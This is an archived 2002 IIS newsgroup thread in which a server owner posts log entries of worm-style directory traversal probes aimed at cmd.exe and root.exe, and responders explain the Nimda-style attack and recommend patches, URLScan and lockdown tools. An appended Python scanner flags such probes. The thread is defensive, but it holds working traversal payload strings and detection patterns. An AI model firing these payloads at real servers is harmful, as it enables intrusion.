I get the following log entries in my IIS log files (see below).
My question:
How do hackers test if specific commands are executable on my server (see
below)?
I want to check my server before the hackers do that!
Where can I find the syntax for that, like ..%5c or ../..%5c../..%
etc.?
thanks
olaf
2002-12-24 21:12:56 195.175.201.169 - 192.168.1.20 80 GET /scripts/root.exe /c+dir 401 -
2002-12-24 21:13:00 195.175.201.169 - 192.168.1.20 80 GET /MSADC/root.exe /c+dir 401 -
2002-12-24 21:13:05 195.175.201.169 - 192.168.1.20 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:09 195.175.201.169 - 192.168.1.20 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:13 195.175.201.169 - 192.168.1.20 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:18 195.175.201.169 - 192.168.1.20 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:23 195.175.201.169 - 192.168.1.20 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:27 195.175.201.169 - 192.168.1.20 80 GET /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:32 195.175.201.169 - 192.168.1.20 80 GET /scripts/..Á ../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:38 195.175.201.169 - 192.168.1.20 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:45 195.175.201.169 - 192.168.1.20 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:54 195.175.201.169 - 192.168.1.20 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:00 195.175.201.169 - 192.168.1.20 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:08 195.175.201.169 - 192.168.1.20 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:16 195.175.201.169 - 192.168.1.20 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:14:24 195.175.201.169 - 192.168.1.20 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:47:18 195.199.176.109 - 192.168.1.20 80 GET /scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 401 -
Firstly, make sure that your IIS servers are up-to-date with the latest
service packs and security updates. Check out
http://www.microsoft.com/security. You can use WindowsUpdate
(http://www.microsoft.com/windowsupdate) or the new Microsoft Base Security
Analyser V1.1 (http://www.microsoft.com/security - a link is on this page to
download).
Also, consider implementing URLScan
(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security
/tools/tools/urlscan.asp), which will stop the use of malicious URLs like the
ones you are getting in your logs. Be careful to read all the documentation
so that you can be sure it does not stop your website from working
correctly.
Richard.
--
This posting is provided "AS IS" with no warranties, and confers no rights.
You assume all risk for your use. © 2001 Microsoft Corporation. All rights
reserved.
"Olaf Coolic" <olaf....@chello.at> wrote in message
news:ewvrAm7rCHA.1776@TK2MSFTNGP09...
Those are classic symptoms of an attempted Nimda attack, which means that
there probably isn't a real live person trying to hack into your box. Most
likely it's another machine that's been infected with Nimda, since a
Nimda-infected machine then tries to go off and infect other machines. This
is basically a trial-and-error process. It's trying to exploit a couple of
known holes in IIS. Fortunately, based on the status codes returned (those
401s), it looks like your machine is properly patched, so those holes
aren't open. If the holes *were* open, the Nimda-infected machine would
recognize this because it would receive a status code of 200, indicating
success. Then it would be able to use those holes to do some damage.
As for checking your server, you can use those exact URL strings from the
log file to build your own URL. Using the first line of the log below as an
example, you could try going to:
http://yourservername/scripts/root.exe /c+dir
If your server is properly patched, you'll get back an error -- probably a
401, 403, or 404. If your server is NOT properly patched, you'll see a
directory listing. (That's all that command is doing -- it's trying to run
the dir command.)
And as Richard said, the best way to make sure you're not vulnerable to
worms like this is to stay up-to-date on your security patches. At a
minimum, you'll want to install the latest service pack for Windows (SP6a
for NT4, SP3 for Win2k, or SP1 for XP), followed by the latest IIS
cumulative security patch:
http://www.microsoft.com/technet/security/bulletin/MS02-062.asp
Here's the link to the IIS Lockdown Tool as well:
http://www.microsoft.com/downloads/release.asp?ReleaseID=43955
You'll want to read this KB article for more information on installing and
configuring it:
Q325864 HOW TO: Install and Use the IIS Lockdown Wizard
http://support.microsoft.com/default.aspx?scid=kb;EN-US;Q325864
Hope this helps,
Lisa
--------------------
> From: "Olaf Coolic" <olaf....@chello.at>
> Subject: GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
> Date: Mon, 30 Dec 2002 05:08:51 +0100
> Lines: 52
> X-Priority: 3
> X-MSMail-Priority: Normal
> X-Newsreader: Microsoft Outlook Express 6.00.2800.1106
> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
> Message-ID: <ewvrAm7rCHA.1776@TK2MSFTNGP09>
> Newsgroups: microsoft.public.inetserver.iis
> NNTP-Posting-Host: chello080110094066.507.15.vie.surfer.at 80.110.94.66
> Path: cpmsftngxa09!TK2MSFTNGP08!TK2MSFTNGP09
> Xref: cpmsftngxa09 microsoft.public.inetserver.iis:239670
> X-Tomcat-NG: microsoft.public.inetserver.iis
-----
Please do not send email directly to this alias. This is an online
account name for newsgroup participation only.
This posting is provided "AS IS" with no warranties, and confers
no rights. You assume all risk for your use.
© 2002 Microsoft Corporation. All rights reserved.
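A defender's way to triage entries like these, added here and not from any poster in the thread: a small Python scanner over W3C-format IIS log lines that flags the traversal and cmd.exe/root.exe probes and, following Lisa's point about status codes, separates blocked probes from any that returned 200. The sample lines are constructed (two adapted from the log above, two made up); the field positions assume the same W3C layout the log above uses.

```python
import re
from urllib.parse import unquote

# Constructed sample in the W3C layout of the thread's log (date time c-ip cs-username
# s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status ...). Lines 1-2 are adapted
# from the log above; lines 3-4 are made up to show a 200 probe and a benign request.
SAMPLE_LOG = """\
2002-12-24 21:12:56 195.175.201.169 - 192.168.1.20 80 GET /scripts/root.exe /c+dir 401 -
2002-12-24 21:13:13 195.175.201.169 - 192.168.1.20 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-12-24 21:13:32 195.175.201.169 - 192.168.1.20 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200 -
2002-12-24 21:15:00 10.0.0.5 - 192.168.1.20 80 GET /default.htm - 200 -
"""

def parse_line(line):
    """Pull client IP, URI stem and status from one W3C line; None for comments/short lines."""
    parts = line.split()
    if len(parts) < 10 or parts[0].startswith("#"):
        return None
    return {"client": parts[2], "stem": parts[7], "status": int(parts[9])}

def classify(entry):
    """'probe-blocked', 'probe-succeeded' (status 200, as Lisa describes) or None."""
    raw = entry["stem"]
    # Decode twice so the double-encoded %255c form also becomes a backslash.
    decoded = unquote(unquote(raw)).replace("\\", "/")
    suspicious = (
        re.search(r"(^|/)(root|cmd)\.exe$", decoded, re.I) is not None
        or "../" in decoded
        or re.search(r"\.\.%[0-9a-f]{2}", raw, re.I) is not None  # ..%5c, ..%c1%1c, ...
    )
    if not suspicious:
        return None
    return "probe-succeeded" if entry["status"] == 200 else "probe-blocked"

def scan(log_text):
    """Per-client counts of blocked/succeeded probes plus the URLs that got a 200."""
    report = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        verdict = classify(entry) if entry else None
        if verdict is None:
            continue
        stats = report.setdefault(
            entry["client"], {"probe-blocked": 0, "probe-succeeded": 0, "hits": []})
        stats[verdict] += 1
        if verdict == "probe-succeeded":
            stats["hits"].append(entry["stem"])
    return report
```

Any client with a non-empty "hits" list is the case Lisa warns about: the probe got a 200 rather than a 401/403/404, so that host needs patching and a closer look, not just a firewall rule.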
They are using the IIS virtual directories (such as SCRIPTS) and then
trying to get back up the physical directory structure to get to a place
where they can issue a DOS command (such as CMD.EXE). If successful,
they will then issue an FTP to bring down files from their computer to
yours and lay down all the backdoor stuff, or just do what they want.
You need a firewall, quickly.
John Wood
What should I block on the firewall?
I need HTTP/SMTP/IMAP. All other ports are cblocked!
Thanks
Olaf
"John Wood" <jo...@lortim.demon.co.uk> wrote in message
news:O4agyLAA...@lortim.demon.co.uk...
and now you are toast!
I don't know what "cblocking" is.
You also need to stop anonymous users getting a user list, which then
allows a dictionary attack on named users, resulting in their
deactivation if your policies are that way inclined (been there too).
I can help if you are on Windows, not if Unix/Linux.
You can contact me offline to get some rules I use:
john at lortim.demon.co.uk
John Wood
Then get URLScan and related tools in this KB:
Resources for Securing Internet Information Services
http://support.microsoft.com/?id=282060
Rgds.
"Olaf Coolic" <olaf....@chello.at> wrote in message
news:#SbhojZsCHA.868@TK2MSFTNGP12...
Thank you. I hope this information is helpful.
Tim Coffey [MSFT]
This posting is provided “AS IS” with no warranties, and confers no rights.
You assume all risk for your use. © 2001 Microsoft Corporation. All rights
reserved.